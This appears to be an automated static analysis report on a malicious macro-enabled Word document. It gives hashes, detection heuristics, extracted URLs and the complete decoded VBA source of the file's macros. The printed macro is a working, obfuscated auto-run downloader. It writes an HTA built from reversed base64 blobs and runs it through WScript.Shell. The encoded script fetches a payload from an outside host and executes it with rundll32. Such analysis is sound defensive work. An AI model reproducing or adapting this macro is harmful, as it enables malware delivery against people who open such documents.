Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 497d6083071a5f58…

MALICIOUS

Office (OOXML)

79.4 KB Created: 2021-05-06 07:53:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-10
MD5: 5bc744508a9d641fdba6e855d4f2ec03 SHA-1: eac7863145b1273643002d8f728bdfd24c3ab6ce SHA-256: 497d6083071a5f5885de507d63edce1db6fea740d649b2395f805f2fb9696ae7
172 Risk Score

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    CreateObject("wscript.shell").exec (sr(viewOption))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("wscript.shell").exec (sr(viewOption))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6215 bytes
SHA-256: b8f85c801db67b122681d942f1a11dc2dc2cfe14df910b803ca1ae388eb2cf61
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{43CAA782-E7DA-4CFB-8BE0-552D6EC7AEBD}{EA7827B2-5BAD-4216-85C7-C15CB3D74A76}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set viewOption = ActiveDocument.BuiltInDocumentProperties("title")
CreateObject("wscript.shell").exec (sr(viewOption))
End Sub


Attribute VB_Name = "mainPasteArgument"
Sub autoopen()
borderRef
End Sub
Function sr(textRightSwap)
sr = VBA.StrReverse(textRightSwap)
End Function
Sub borderRef()
Dim valueLibLen As String
deleteABuffer = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ")
valueLibLen = deleteABuffer(1)
Set arrayVbSize = New collectionLocalRef
arrayVbSize.viewGenericBorder valueLibLen, textFunc
frm.button1_Click
End Sub

Attribute VB_Name = "indexSwap"
Public Function storageRightGeneric(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("<html><body><div id='content1'>fTtlc29sYy5ldGVsZURlY2Fwc2VtYU50Y3VydHM7KTIgLCJncGouYmlMcG1ldFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvd", "GV2YXMuZXRlbGVEZWNhcHNlbWFOdGN1cnRzOyl5ZG9iZXNub3BzZXIueXJldVFlc2FiYXRhZChldGlydy5ldGVsZURlY2Fwc2VtYU50Y3VydHM7MSA9IGVweXQuZXRlb", "GVEZWNhcHNlbWFOdGN1cnRzO25lcG8uZXRlbGVEZWNhcHNlbWFOdGN1cnRzOykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGV0ZWxlRGVjYXBzZW1hT", "nRjdXJ0cyByYXZ7KTAwMiA9PSBzdXRhdHMueXJldVFlc2FiYXRhZChmaTspKGRuZXMueXJldVFlc2FiYXRhZDspZXNsYWYgLCJ1UWFCQj0manRpRjFVcnJFWDFVQUZiU", "kx6QT1oY3JhZXMmb1FUeGVXYWJpRGk4ZGVHcWF1ZT1yZXN1JmxGZkRXYWNBcDlOPWVtaXQmR2E3NzJRRkd2RklQZz1kaWMmVmx0eEdodUVic0R0PUhPeXYmVmFWcDU9W", "Tg2SWN3JlNZaHVOcDB4PWRpcz80dnlsL1ZrU0llN0JGU3duL1VmelNlS2toUlRGYkllZ1FjTWYyZTVoNGI5LzB4RWUvTXFqU0F6N29lcm9rbmx5SzkxdTllTkRBTXBTQ", "XJhL25RTFRlSktMYUFyalFJaEFxVDg2e"), "")
End If
storageRightGeneric = rightSizeFunc
End Function
Public Function referenceReferenceGlobal(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("W5zVHBaNnZCWndYazlCTWZMSzB0Qi9JWW5pNUNhVmdSRDRvckovMDcyNzYvc29zZ2QvbW9jLmF5ZWxkdWRlY25lc3NlLy86cHR0aCIgLCJURUciKG5lcG8ueXJldVFlc", "2FiYXRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHlyZXVRZXNhYmF0YWQgcmF2</div><div id='content2'>fXspcmV0bnVvQ25pYU1l", "dm9tZXIoaGN0YWN9OykiYXRoLmJpTHBtZXRcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLnNzYWxDd2VpVnJvdGFyZXRpe3lydDspInRjZWpib21ldHN5c2Vs", "aWYuZ25pdHBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHNzYWxDd2VpVnJvdGFyZXRpIHJhdjspInRpbkluaWd1bFAsZ3BqLmJpTHBtZXRcXGNpbGJ1cFxcc3Jlc3Vc", "XDpjIDIzbGxkbnVyIihudXIuKSJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==</div><div id='content3'></div><div id='table1'>ABCDEFGH", "IJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/</div><div id='table3'></div><script language='javascript'>function nextReq", "uest(borderLibDocument){return(n"), "")
End If
referenceReferenceGlobal = rightSizeFunc
End Function
Public Function loadView(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("ew ActiveXObject(borderLibDocument));}function tableViewBorder(iteratorArgumentBorder){return(libWindowTemp.getElementById(itera", "torArgumentBorder).innerHTML);}function textBorderText(){var vbTemp = tableViewBorder('table1');var memLeft = vbTemp.toLowerCase", "();var vbPaste = tableViewBorder('table2');return(vbTemp + memLeft + vbPaste);}function valueDocumentLen(s){var e={}; var i; var", " b=0; var c; var x; var l=0; var a; var captionStorage=''; var w=String.fromCharCode; var L=s.length;var deleteOption = indexInd", "exGlobal('tArahc');for(i=0;i<64;i++){e[textBorderText()[deleteOption](i)]=i;}for(x=0;x<L;x++){c=e[s[deleteOption](x)];b=(b<<6)+c", ";l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(captionStorage+=w(a));}}return(captionStorage);};function indexIndexGloba", "l(mainDataIndex){return mainData"), "")
End If
loadView = rightSizeFunc
End Function
Public Function requestValue(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("Index.split('').reverse().join('');}tempBorderSize = window;libWindowTemp = document;tempBorderSize.resizeTo(1, 1);tempBorderSiz", "e.moveTo(-100, -100);var selectReference = libWindowTemp.getElementById('content1').innerHTML;var bufConstText = libWindowTemp.g", "etElementById('content2').innerHTML;var selectReference = indexIndexGlobal(valueDocumentLen(selectReference));var bufConstText =", " indexIndexGlobal(valueDocumentLen(bufConstText));</script><script language='javascript'>function memOptionBuffer(textStorageVar", "){var databaseException = nextRequest(indexIndexGlobal('lortnoctpircs.lortnoctpircssm'));databaseException['Language'] = 'jscrip", "t';databaseException['Timeout'] = 60000;databaseException['AddCode'](textStorageVar);return(null);}</script><script language='vb", "script'>Call memOptionBuffer(sel"), "")
End If
requestValue = rightSizeFunc
End Function
Public Function refTempReference(lenMain)
If (Len(lenMain) < 1024) Then
rightSizeFunc = Join(Array("ectReference) : Call memOptionBuffer(bufConstText)</script><script language='javascript'>tempBorderSize['close']();</script></bo", "dy></html>"), "")
End If
refTempReference = rightSizeFunc
End Function
Function textFunc()
textFunc = storageRightGeneric("elec") + referenceReferenceGlobal("opyA") + loadView("ptio") + requestValue("indo") + refTempReference("aria")
End Function

Attribute VB_Name = "collectionLocalRef"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function viewGenericBorder(selectTextboxBuffer As String, lenTempTemp As String)
Open selectTextboxBuffer For Output As #1
Print #1, lenTempTemp
Close #1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30208 bytes
SHA-256: 4489c8a08a6cec1486df34ce423bbe33de091b858734ff303d32780b15d95773
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.